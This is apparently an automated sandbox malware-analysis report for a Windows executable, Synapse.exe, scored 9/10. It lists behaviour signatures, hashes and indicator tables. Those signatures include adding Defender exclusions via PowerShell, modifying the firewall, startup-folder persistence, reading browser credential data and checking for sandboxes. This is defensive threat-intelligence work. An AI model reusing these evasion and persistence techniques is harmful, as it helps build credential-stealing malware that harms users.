fb025a0aa34315c3287c087cc598598732f8e96cbcba4cd5ea2d728a270e5467

Resubmissions

12-05-2024 04:36

240512-e8aqxsca79 6

12-05-2024 04:26

240512-e2tkfsbf56 9

12-05-2024 04:22

240512-ezqqsabe56 10

12-05-2024 04:18

240512-ewyxzsbd26 8

Analysis

max time kernel
463s
max time network
471s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
12-05-2024 04:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Synapse.exe
Size

17.5MB
MD5

0c015a50850cec3d831b97980180b73b
SHA1

3a95c7334e446975d3d22a753075f4941a00177c
SHA256

fb025a0aa34315c3287c087cc598598732f8e96cbcba4cd5ea2d728a270e5467
SHA512

47f49f646f0141f0f5cba08269ef3780f2e1d85707f32b94c363c208af827b82c0e1d98355da1e0240cb93eca6d3337b382db84a549ba93759bb719383eb2e84
SSDEEP

393216:pv90+5gDTj5L1V8dXurEUWjsrfTbEkPKkvbuK+x:l9PkNRkdb8fTbIkSK+

Score

9^/10

discovery evasion execution spyware stealer upx

Malware Config

Signatures

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5716	powershell.exe
4352	powershell.exe
1644	powershell.exe
5056	powershell.exe
3496	powershell.exe
3124	powershell.exe
976	powershell.exe
452	powershell.exe
396	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
324	netsh.exe
5036	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	FiddlerSetup.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Synapse.exe	Synapse.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Synapse.exe	Synapse.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Synapse.exe	Synapse.exe

Executes dropped EXE 9 IoCs

pid	Process
2372	FiddlerSetup.5.0.20242.10753-latest.exe
1960	FiddlerSetup.exe
2500	SetupHelper
5724	Fiddler.exe
4220	Fiddler.exe
5352	Fiddler.exe
4128	Fiddler.exe
4528	Fiddler.exe
5616	Fiddler.exe

Loads dropped DLL 64 IoCs

pid	Process
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000234a5-132.dat	upx
behavioral2/memory/2308-136-0x00007FFC40E10000-0x00007FFC414D5000-memory.dmp	upx
behavioral2/files/0x0007000000023457-138.dat	upx
behavioral2/memory/2308-143-0x00007FFC53F80000-0x00007FFC53FA5000-memory.dmp	upx
behavioral2/files/0x000700000002349f-144.dat	upx
behavioral2/memory/2308-146-0x00007FFC56140000-0x00007FFC5614F000-memory.dmp	upx
behavioral2/files/0x0007000000023455-147.dat	upx
behavioral2/memory/2308-150-0x00007FFC53EA0000-0x00007FFC53EBA000-memory.dmp	upx
behavioral2/files/0x000700000002345a-149.dat	upx
behavioral2/memory/2308-152-0x00007FFC52180000-0x00007FFC521AD000-memory.dmp	upx
behavioral2/files/0x0007000000023454-198.dat	upx
behavioral2/files/0x00070000000234ab-196.dat	upx
behavioral2/files/0x00070000000234a9-195.dat	upx
behavioral2/files/0x00070000000234a8-194.dat	upx
behavioral2/files/0x00070000000234a3-193.dat	upx
behavioral2/files/0x00070000000234a0-192.dat	upx
behavioral2/files/0x000700000002349e-191.dat	upx
behavioral2/memory/2308-199-0x00007FFC53E90000-0x00007FFC53E9D000-memory.dmp	upx
behavioral2/memory/2308-200-0x00007FFC51080000-0x00007FFC51099000-memory.dmp	upx
behavioral2/memory/2308-201-0x00007FFC52160000-0x00007FFC5216D000-memory.dmp	upx
behavioral2/memory/2308-202-0x00007FFC51070000-0x00007FFC5107D000-memory.dmp	upx
behavioral2/memory/2308-203-0x00007FFC51050000-0x00007FFC51064000-memory.dmp	upx
behavioral2/memory/2308-204-0x00007FFC40E10000-0x00007FFC414D5000-memory.dmp	upx
behavioral2/memory/2308-205-0x00007FFC408E0000-0x00007FFC40E09000-memory.dmp	upx
behavioral2/memory/2308-206-0x00007FFC53F80000-0x00007FFC53FA5000-memory.dmp	upx
behavioral2/memory/2308-207-0x00007FFC50760000-0x00007FFC50793000-memory.dmp	upx
behavioral2/memory/2308-208-0x00007FFC50690000-0x00007FFC5075D000-memory.dmp	upx
behavioral2/memory/2308-210-0x00007FFC4FAA0000-0x00007FFC4FAB2000-memory.dmp	upx
behavioral2/memory/2308-209-0x00007FFC4FAC0000-0x00007FFC4FAD6000-memory.dmp	upx
behavioral2/memory/2308-211-0x00007FFC4FA60000-0x00007FFC4FA95000-memory.dmp	upx
behavioral2/memory/2308-212-0x00007FFC53E90000-0x00007FFC53E9D000-memory.dmp	upx
behavioral2/memory/2308-214-0x00007FFC3D350000-0x00007FFC3D4CE000-memory.dmp	upx
behavioral2/memory/2308-213-0x00007FFC4FBB0000-0x00007FFC4FBD4000-memory.dmp	upx
behavioral2/memory/2308-215-0x00007FFC4FB90000-0x00007FFC4FBA8000-memory.dmp	upx
behavioral2/memory/2308-216-0x00007FFC4FB00000-0x00007FFC4FB87000-memory.dmp	upx
behavioral2/memory/2308-219-0x00007FFC3E750000-0x00007FFC3E777000-memory.dmp	upx
behavioral2/memory/2308-218-0x00007FFC4FAF0000-0x00007FFC4FAFB000-memory.dmp	upx
behavioral2/memory/2308-217-0x00007FFC51050000-0x00007FFC51064000-memory.dmp	upx
behavioral2/memory/2308-221-0x00007FFC3D230000-0x00007FFC3D34B000-memory.dmp	upx
behavioral2/memory/2308-220-0x00007FFC408E0000-0x00007FFC40E09000-memory.dmp	upx
behavioral2/memory/2308-222-0x00007FFC50760000-0x00007FFC50793000-memory.dmp	upx
behavioral2/memory/2308-223-0x00007FFC4FAE0000-0x00007FFC4FAEB000-memory.dmp	upx
behavioral2/memory/2308-224-0x00007FFC49720000-0x00007FFC4972B000-memory.dmp	upx
behavioral2/memory/2308-228-0x00007FFC3FB60000-0x00007FFC3FB6B000-memory.dmp	upx
behavioral2/memory/2308-227-0x00007FFC41740000-0x00007FFC4174C000-memory.dmp	upx
behavioral2/memory/2308-226-0x00007FFC46E90000-0x00007FFC46E9B000-memory.dmp	upx
behavioral2/memory/2308-225-0x00007FFC47540000-0x00007FFC4754C000-memory.dmp	upx
behavioral2/memory/2308-229-0x00007FFC4FAA0000-0x00007FFC4FAB2000-memory.dmp	upx
behavioral2/memory/2308-233-0x00007FFC3F5E0000-0x00007FFC3F5EC000-memory.dmp	upx
behavioral2/memory/2308-232-0x00007FFC3EDA0000-0x00007FFC3EDAC000-memory.dmp	upx
behavioral2/memory/2308-231-0x00007FFC3EEB0000-0x00007FFC3EEBE000-memory.dmp	upx
behavioral2/memory/2308-230-0x00007FFC3F5F0000-0x00007FFC3F5FC000-memory.dmp	upx
behavioral2/memory/2308-234-0x00007FFC3ED90000-0x00007FFC3ED9B000-memory.dmp	upx
behavioral2/memory/2308-235-0x00007FFC3D200000-0x00007FFC3D20C000-memory.dmp	upx
behavioral2/memory/2308-240-0x00007FFC3D1C0000-0x00007FFC3D1CC000-memory.dmp	upx
behavioral2/memory/2308-239-0x00007FFC3D210000-0x00007FFC3D21C000-memory.dmp	upx
behavioral2/memory/2308-238-0x00007FFC3D220000-0x00007FFC3D22B000-memory.dmp	upx
behavioral2/memory/2308-237-0x00007FFC3D1D0000-0x00007FFC3D1E2000-memory.dmp	upx
behavioral2/memory/2308-236-0x00007FFC3D1F0000-0x00007FFC3D1FD000-memory.dmp	upx
behavioral2/memory/2308-243-0x00007FFC3CF70000-0x00007FFC3D1B5000-memory.dmp	upx
behavioral2/memory/2308-242-0x00007FFC3D350000-0x00007FFC3D4CE000-memory.dmp	upx
behavioral2/memory/2308-241-0x00007FFC4FBB0000-0x00007FFC4FBD4000-memory.dmp	upx
behavioral2/memory/2308-245-0x00007FFC3CF00000-0x00007FFC3CF2E000-memory.dmp	upx
behavioral2/memory/2308-244-0x00007FFC3CF30000-0x00007FFC3CF59000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
34	raw.githubusercontent.com
35	raw.githubusercontent.com
44	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
113	api.ipify.org
108	api.ipify.org
109	api.ipify.org

Drops file in Windows directory 36 IoCs

description	ioc	Process
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data.SqlXml\22b31f1b9eca85580b198424dd16a98a\System.Data.SqlXml.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\15ec-0\EnableLoopback.exe	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\ba90284a07d8bc0ce7e6273afa79210f\System.Numerics.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1184-0\System.Runtime.Serialization.Formatters.Soap.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt9064068c#\f85535a7092741215f67fdedf2846499\System.Runtime.Serialization.Formatters.Soap.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\aec-0\System.Data.SqlXml.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1654-0\System.Security.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\ba90284a07d8bc0ce7e6273afa79210f\System.Numerics.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10d4-0\System.Numerics.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\M4CBZ5XKJO\System.Security.ni.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1608-0\System.Data.SqlXml.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data.SqlXml\22b31f1b9eca85580b198424dd16a98a\System.Data.SqlXml.ni.dll.aux.tmp	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\O88LJQHNA9\System.Numerics.ni.dll.aux	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Security\7355af105ad86679d6c9070a9b4dc0c3\System.Security.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Security\7355af105ad86679d6c9070a9b4dc0c3\System.Security.ni.dll.aux.tmp	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\YJN4IWZGCI\Microsoft.JScript.ni.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\ZC64QCQ143\System.Deployment.ni.dll.aux	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\JFXLY9BRKN\System.Data.SqlXml.ni.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1740-0\System.Security.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1794-0\System.Runtime.Serialization.Formatters.Soap.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.JScript\3b5383dd37da6f390d4d4ad42fcb5b32\Microsoft.JScript.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\16a0-0\System.Web.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Web\44d302d3062a00a6bd5a39f743bdb4ef\System.Web.ni.dll.aux.tmp	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\Z4QNQLRF43\System.Runtime.Serialization.Formatters.Soap.ni.dll.aux	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\JFXLY9BRKN\System.Data.SqlXml.ni.dll.aux	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Deployment\18271de25c06b49b2aaa391461de2df6\System.Deployment.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Deployment\18271de25c06b49b2aaa391461de2df6\System.Deployment.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt9064068c#\f85535a7092741215f67fdedf2846499\System.Runtime.Serialization.Formatters.Soap.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1098-0\Microsoft.JScript.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\Z4QNQLRF43\System.Runtime.Serialization.Formatters.Soap.ni.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\ZC64QCQ143\System.Deployment.ni.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\6f0-0\System.Deployment.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1620-0\System.Numerics.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\16d4-0\System.Deployment.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\O88LJQHNA9\System.Numerics.ni.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\EnableLoopback\d12b539b25fd704b7b7ae29b10af66db\EnableLoopback.ni.exe.aux.tmp	mscorsvw.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2320	WMIC.exe
4556	WMIC.exe

Enumerates system info in registry 2 TTPs 18 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	FiddlerSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Fiddler.exe = "0"	FiddlerSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Fiddler.exe = "9999"	FiddlerSetup.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133599617278529672"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 15 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Fiddler.ArchiveZip\Content Type = "application/vnd.telerik-fiddler.SessionArchive"	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Fiddler.ArchiveZip\ = "Fiddler Session Archive"	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Fiddler.ArchiveZip	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Fiddler.ArchiveZip\PerceivedType = "compressed"	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Fiddler.ArchiveZip\Shell	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Fiddler.ArchiveZip\Shell\Open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Fiddler\\Fiddler.exe\" -noattach \"%1\""	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Fiddler.ArchiveZip\Shell\Open &in Viewer\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Fiddler\\Fiddler.exe\" -viewer \"%1\""	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\.saz\ = "Fiddler.ArchiveZip"	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Fiddler.ArchiveZip\Shell\Open	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Fiddler.ArchiveZip\Shell\Open &in Viewer\command	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Fiddler.ArchiveZip\Shell\Open &in Viewer	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\.saz	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Fiddler.ArchiveZip\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Fiddler\\SAZ.ico"	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Fiddler.ArchiveZip\Shell\Open\command	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Fiddler.ArchiveZip\DefaultIcon	FiddlerSetup.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
776	powershell.exe
776	powershell.exe
776	powershell.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
2308	Synapse.exe
1644	powershell.exe
1644	powershell.exe
1644	powershell.exe
5056	powershell.exe
5056	powershell.exe
5056	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
1212	powershell.exe
1212	powershell.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
5020	Synapse.exe
1212	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
3124	powershell.exe
3124	powershell.exe
3124	powershell.exe
452	powershell.exe
452	powershell.exe
452	powershell.exe
4008	chrome.exe
4008	chrome.exe
1960	FiddlerSetup.exe
1960	FiddlerSetup.exe
1128	msedge.exe
1128	msedge.exe
4800	msedge.exe
4800	msedge.exe
5724	Fiddler.exe
5724	Fiddler.exe
5724	Fiddler.exe
5724	Fiddler.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5724	taskmgr.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
656	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 28 IoCs

pid	Process
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4800	msedge.exe
4800	msedge.exe
4532	msedge.exe
4532	msedge.exe
2376	msedge.exe
2376	msedge.exe
4832	msedge.exe
4832	msedge.exe
4832	msedge.exe
4832	msedge.exe
4832	msedge.exe
4832	msedge.exe
4832	msedge.exe
2500	chrome.exe
2500	chrome.exe
2500	chrome.exe
2500	chrome.exe
2500	chrome.exe
2500	chrome.exe
2500	chrome.exe
2500	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2308	Synapse.exe
Token: SeIncreaseQuotaPrivilege	3308	WMIC.exe
Token: SeSecurityPrivilege	3308	WMIC.exe
Token: SeTakeOwnershipPrivilege	3308	WMIC.exe
Token: SeLoadDriverPrivilege	3308	WMIC.exe
Token: SeSystemProfilePrivilege	3308	WMIC.exe
Token: SeSystemtimePrivilege	3308	WMIC.exe
Token: SeProfSingleProcessPrivilege	3308	WMIC.exe
Token: SeIncBasePriorityPrivilege	3308	WMIC.exe
Token: SeCreatePagefilePrivilege	3308	WMIC.exe
Token: SeBackupPrivilege	3308	WMIC.exe
Token: SeRestorePrivilege	3308	WMIC.exe
Token: SeShutdownPrivilege	3308	WMIC.exe
Token: SeDebugPrivilege	3308	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3308	WMIC.exe
Token: SeRemoteShutdownPrivilege	3308	WMIC.exe
Token: SeUndockPrivilege	3308	WMIC.exe
Token: SeManageVolumePrivilege	3308	WMIC.exe
Token: 33	3308	WMIC.exe
Token: 34	3308	WMIC.exe
Token: 35	3308	WMIC.exe
Token: 36	3308	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3308	WMIC.exe
Token: SeSecurityPrivilege	3308	WMIC.exe
Token: SeTakeOwnershipPrivilege	3308	WMIC.exe
Token: SeLoadDriverPrivilege	3308	WMIC.exe
Token: SeSystemProfilePrivilege	3308	WMIC.exe
Token: SeSystemtimePrivilege	3308	WMIC.exe
Token: SeProfSingleProcessPrivilege	3308	WMIC.exe
Token: SeIncBasePriorityPrivilege	3308	WMIC.exe
Token: SeCreatePagefilePrivilege	3308	WMIC.exe
Token: SeBackupPrivilege	3308	WMIC.exe
Token: SeRestorePrivilege	3308	WMIC.exe
Token: SeShutdownPrivilege	3308	WMIC.exe
Token: SeDebugPrivilege	3308	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3308	WMIC.exe
Token: SeRemoteShutdownPrivilege	3308	WMIC.exe
Token: SeUndockPrivilege	3308	WMIC.exe
Token: SeManageVolumePrivilege	3308	WMIC.exe
Token: 33	3308	WMIC.exe
Token: 34	3308	WMIC.exe
Token: 35	3308	WMIC.exe
Token: 36	3308	WMIC.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	976	powershell.exe
Token: SeDebugPrivilege	5020	Synapse.exe
Token: SeIncreaseQuotaPrivilege	3860	WMIC.exe
Token: SeSecurityPrivilege	3860	WMIC.exe
Token: SeTakeOwnershipPrivilege	3860	WMIC.exe
Token: SeLoadDriverPrivilege	3860	WMIC.exe
Token: SeSystemProfilePrivilege	3860	WMIC.exe
Token: SeSystemtimePrivilege	3860	WMIC.exe
Token: SeProfSingleProcessPrivilege	3860	WMIC.exe
Token: SeIncBasePriorityPrivilege	3860	WMIC.exe
Token: SeCreatePagefilePrivilege	3860	WMIC.exe
Token: SeBackupPrivilege	3860	WMIC.exe
Token: SeRestorePrivilege	3860	WMIC.exe
Token: SeShutdownPrivilege	3860	WMIC.exe
Token: SeDebugPrivilege	3860	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3860	WMIC.exe
Token: SeRemoteShutdownPrivilege	3860	WMIC.exe
Token: SeUndockPrivilege	3860	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
